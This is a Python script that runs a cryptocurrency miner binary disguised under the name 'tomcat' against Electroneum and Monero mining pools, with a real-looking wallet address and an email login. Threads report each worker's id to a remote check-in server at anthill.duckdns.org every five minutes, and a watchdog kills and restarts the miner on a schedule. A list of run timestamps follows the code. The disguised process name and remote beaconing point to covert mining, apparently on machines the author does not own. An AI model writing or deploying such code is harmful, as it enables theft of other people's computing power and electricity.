import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:34:06.883877
#2018-02-17 16:20:01.383244
#2018-02-17 18:07:01.909256
#2018-02-17 19:54:07.604961
#2018-02-17 21:43:07.514021
#2018-02-17 23:27:06.369669
#2018-02-18 01:17:05.006095
#2018-02-18 03:04:07.552558
#2018-02-18 04:52:05.800328
#2018-02-18 06:43:07.100623
#2018-02-18 08:33:05.159753
#2018-02-18 10:20:04.221524
#2018-02-18 12:06:04.182209
#2018-02-18 13:50:08.465128
#2018-02-18 15:41:04.502010
#2018-02-18 17:31:03.385547
#2018-02-18 19:18:04.611108
#2018-02-18 21:06:05.076207
#2018-02-18 22:53:04.303033
#2018-02-19 00:42:06.217340
#2018-02-19 02:28:06.852646
#2018-02-19 04:15:08.639658
#2018-02-19 06:02:07.473928
#2018-02-19 07:50:01.712625
#2018-02-19 09:40:07.340103
#2018-02-19 11:28:07.227313
#2018-02-19 13:17:06.435787
#2018-02-19 15:04:08.541880
#2018-02-19 16:53:01.420173
#2018-02-19 18:39:02.156377
#2018-02-19 20:27:04.140134
#2018-02-19 22:14:08.139691
#2018-02-20 00:00:01.954838
#2018-02-20 01:47:04.731521
#2018-02-20 03:34:05.717717
#2018-02-20 05:21:02.088143
#2018-02-20 07:05:01.512214
#2018-02-20 08:50:09.319139
#2018-02-20 10:33:09.807714
#2018-02-20 12:18:07.739681
#2018-02-20 14:07:10.065696
#2018-02-20 15:50:07.708117
#2018-02-20 17:37:06.732396
#2018-02-20 19:26:07.612232
#2018-02-20 21:15:10.311214
#2018-02-20 23:02:05.510539
#2018-02-21 00:47:06.064680
#2018-02-21 02:34:07.537074
#2018-02-21 04:24:04.513420
#2018-02-21 06:12:08.058510
#2018-02-21 07:58:01.814988
#2018-02-21 09:43:09.175687
#2018-02-21 11:32:09.882271
#2018-02-21 13:22:10.935561
#2018-02-21 15:07:01.437662
#2018-02-21 16:56:01.691108
#2018-02-21 18:44:01.636967
#2018-02-21 20:32:08.869680
#2018-02-21 22:18:02.192167
#2018-02-22 00:07:01.860595
#2018-02-22 01:54:07.901064
#2018-02-22 03:41:10.056848
#2018-02-22 05:28:07.752373
#2018-02-22 07:13:03.395007
#2018-02-22 08:59:01.443690
#2018-02-22 10:46:09.137722
#2018-02-22 12:34:01.260861
#2018-02-22 15:30:01.806971
#2018-02-22 17:16:06.812117
#2018-02-22 19:03:07.721698
#2018-02-22 20:54:01.863369
#2018-02-22 22:41:02.076164
#2018-02-23 00:27:07.408881
#2018-02-23 02:15:08.550633
#2018-02-23 04:05:03.751217
#2018-02-23 05:52:06.565569
#2018-02-23 07:42:06.583395
#2018-02-23 09:44:07.193872
#2018-02-23 11:51:06.939768
#2018-02-23 13:40:09.446317
#2018-02-23 15:28:04.745102
#2018-02-23 17:19:02.159422
#2018-02-23 19:05:07.465538
#2018-02-23 20:50:07.397810
#2018-02-23 22:32:04.269752
#2018-02-24 00:18:03.581386
#2018-02-24 02:11:06.567566
#2018-02-24 04:01:07.159634
#2018-02-24 05:46:01.546494
#2018-02-24 07:38:05.315597
#2018-02-24 09:23:07.221446
#2018-02-24 11:17:02.128556
#2018-02-24 13:06:04.158291
#2018-02-24 14:55:04.088701
#2018-02-24 16:45:07.284554
#2018-02-24 18:33:08.154977
#2018-02-24 20:20:07.547786
#2018-02-24 22:16:01.691167
#2018-02-25 01:24:06.579049
#2018-02-25 03:59:06.111606
#2018-02-25 07:47:06.894106